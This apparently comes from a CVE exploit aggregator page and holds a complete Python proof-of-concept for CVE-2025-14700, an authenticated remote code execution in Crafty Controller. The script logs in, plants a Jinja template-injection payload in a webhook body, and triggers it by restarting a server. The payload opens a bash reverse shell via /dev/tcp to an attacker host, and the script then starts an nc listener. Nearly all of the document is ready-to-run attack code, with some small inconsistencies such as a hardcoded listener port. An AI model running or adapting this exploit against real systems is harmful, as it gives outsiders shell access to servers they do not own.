4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-14700.py PY
#!/usr/bin/env python3

# Turn off warnings 
import warnings
from urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', InsecureRequestWarning)

import re
import os
import sys
import time
import socket
import requests
import argparse
import threading

# modify this according to your host, maybe a different payload will work (checkout revshells.com)
REVSHELL_TEMPLATE = "bash -c 'bash -i >/dev/tcp/%s/%d 0<&1 2>&1'"

# check if Crafty Controller is up and running properly
def sanity_check(url: str):
    try:
        res = requests.get(url + "/api/v2/crafty/check", verify=False)
        if res.status_code == 200:
            return res.json().get("status") == "ok"
        else:
            return False
    except Exception as e:
        # print(e)
        return False

def api_login(session: requests.Session, url: str, login: str, password: str) -> (int, str):
    endpoint = url + "/api/v2/auth/login/"
    data = {
        "username": login,
        "password": password
    }
    res = session.post(endpoint, json=data, verify=False) # don't check SSL cert
    if res.status_code == 200:
        res_data = res.json()
        if res_data.get("status") == "ok":
            return (int(res_data.get("data").get("user_id")), res_data.get("data").get("token"))
        else:
            err, msg = res_data.get("error"), res_data.get("error_data")
            print(f"[FATAL] Failed to login : {err} - {msg}")
    else:
        print(f"[FATAL] Got status code {res.status_code} on {endpoint}")

    # if we get here then something went wrong
    exit(-1)

def get_version(session: requests.Session, url: str) -> (int, int, int):
    endpoint = url + "/metrics"
    res = session.get(endpoint, verify=False)
    if res.status_code != 200:
        return (-1, -1, -1) # couldn't find version

    query = re.search(r'Crafty_Controller_info\{docker="(True|False)",version="(\d+)\s+\.(\d+)\s+\.(\d+)"\}', res.text)
    if not query or len(query.groups()) != 4:
        return (-1, -1, -1)

    return tuple(map(int, query.groups()[1:]))

def get_servers(session: requests.Session, url: str, uid: int) -> list[str]:
    endpoint = url + "/api/v2/servers"
    res = session.get(endpoint, verify=False)

    if res.status_code != 200:
        print("[-] Failed to fetch servers, returning empty list.")
        return []

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[-] Failed to fetch servers: {err} - {msg}, returning empty list.")
        return []

    data = data.get("data")
    result = []
    for server in data:
        if server.get("created_by") == uid:
            result.append(server.get("server_id"))
    return result

def create_server(session: requests.Session, url: str) -> str:
    endpoint = url + "/api/v2/servers"
    data = {
        "name": "Example Java server.",
        "monitoring_type": "minecraft_java",
        "minecraft_java_monitoring_data": {
            "host": "127.0.0.1",
            "port": 25565
            },
        "create_type": "minecraft_java",
        "minecraft_java_create_data": {
            "create_type": "download_jar",
            "download_jar_create_data": {
                "category": "mc_java_servers",
                "type": "paper",
                "version": "1.18.2",
                "mem_min": 1,
                "mem_max": 2,
                "server_properties_port": 25565
            }
        }
    }
    res = session.post(endpoint, json=data, verify=False)
    if res.status_code not in (200, 201): # depends on API version
        print("[FATAL] Failed to create server. Cannot continue.")
        print(res.status_code)
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[FATAL] Failed to create server: {err} - {msg}")
        exit(-1)

    data = data.get("data")
    return data.get("new_server_id")

def create_hook(session: requests.Session, url: str, server_id: str, lhost: str, lport: int):
    endpoint = url + f"/api/v2/servers/{server_id}/webhook"
    revshell_cmd = REVSHELL_TEMPLATE % (lhost, lport)
    print("[*] revshell payload : " + revshell_cmd)
    payload = f"{{{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system(\"{revshell_cmd}\") }}}}"
    data = {
        "webhook_type": "Discord",
        "name": "My example Webhook",
        "url": "https://localhost:8443/", # doesn't matter if we want to setup a rev shell
        "bot_name": "Crafty Bot",
        "trigger": [
            "start_server"
        ],
        "body": payload,
        "color": "#c646000",
        "enabled": True
    }
    res = session.post(endpoint, json=data, verify=False)
    if res.status_code not in (200, 201):
        print(res.status_code)
        print(res.text)
        print("[FATAL] Failed to create vulnerable webhook.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[fatal] failed to create vulnerable webhook: {err} - {msg}")
        exit(-1)

# must be run in different thread for proper payload trigger timing
def trigger_exploit(session: requests.Session, url: str, server_id: str):
    print("[*] Waiting 7 seconds before triggering payload")
    time.sleep(2)
    endpoint = url + f"/api/v2/servers/{server_id}/action/kill_server"
    endpoint2= url + f"/api/v2/servers/{server_id}/action/start_server"
    endpoint3 = url + f"/api/v2/servers/{server_id}/action/eula"

    # kill server
    res = session.post(endpoint, verify=False)
    if res.status_code != 200:
        print("[*] failed to kill server.")

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[-] failed to kill server: {err} - {msg}")

    # start server
    res = session.post(endpoint2, verify=False)
    if res.status_code != 200:
        print("[FATAL] failed to trigger payload.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[FATAL] failed to trigger payload: {err} - {msg}")
        exit(-1)

    time.sleep(5) # wait for EULA prompt

    # validate EULA
    res = session.post(endpoint3, verify=False)
    if res.status_code != 200:
        print("[FATAL] failed to trigger payload.")
        exit(-1)

    data = res.json()
    if data.get("status") != "ok":
        err, msg = data.get("error"), data.get("error_data")
        print(f"[FATAL] failed to trigger payload: {err} - {msg}")
        exit(-1)

    print("[+] TRIGGERED PAYLOAD WAIT FOR SHELL")

def exploit(url: str, login: str, password: str, lhost: str, lport: int):
    session = requests.Session()

    if not sanity_check(url):
        print("[FATAL] Couldn't reach Crafty-Controller host or server is down.")
        return

    print(f"[+] Crafty Controller is running on {url}")

    uid, jwt = api_login(session, url, login, password)
    print(f"[+] Logged in as {login} : (uid = {uid}, jwt = {jwt})")

    major, middle, minor = get_version(session, url)
    print(f"[+] Target is running version {major}.{middle}.{minor}")
    if major <= 4 and middle <= 6 and minor <= 1:
        print("[+] VERSION IS VULNERABLE")
    elif (major, middle, minor) == (-1, -1, -1):
        print("[*] Couldn't fetch version. Maybe this instance isn't vulnerable.")
        res = input("Do you want to continue anyways (y/n) : ")
        if res.upper() == "N":
            print("Terminating.")
            exit(-1)
    else:
        print("[FATAL] VERSION IS NOT VULNERABLE")
        exit(-1)

    print(f"[*] checking if there is a server owned by {login}")
    owned_servers = get_servers(session, url, uid)
    print(f"[+] found {len(owned_servers)} server(s) owned by {login}.")

    if len(owned_servers) >= 1:
        res = input("Do you want to create a new server to exploit (saying no will use an existing one) ? (y/n)")
        if res == "n":
            server_id = owned_servers[0]
        else:
            server_id = create_server(session, url)
    else:
        server_id = create_server(session, url)

    # now we have our exploit server
    print(f"[+] Using server {server_id} for exploit.")

    create_hook(session, url, server_id, lhost, lport)

    print(f"[+] Created vulnerable hook ! starting server will trigger reverse shell on {lhost}:{lport}")

    trigger_thread = threading.Thread(target=trigger_exploit, args=(session, url, server_id,))
    trigger_thread.start()

    os.system("nc -nvlp 1234")



if __name__ == "__main__":
    parser = argparse.ArgumentParser(
            prog='CVE-2025-14700',
            description='POC script for Authenticated RCE in Crafty-Controller Webhooks',
            epilog="by Nosiume @ 2025-12-17")
    parser.add_argument('--url', '-u', help='The remote path in url format of the Crafty Controller instance', required=True)
    parser.add_argument('--login', '-l', help='Username of the authenticated user', required=True)
    parser.add_argument('--password', '-p', help='Password of the authenticated user', required=True)
    parser.add_argument('--lhost', '-lh', help='IP to listen on', required=True)
    parser.add_argument('--lport', '-lp', help='PORT to listen on', type=int, required=True)
    args = parser.parse_args(sys.argv[1:])

    exploit(args.url, args.login, args.password, args.lhost, args.lport)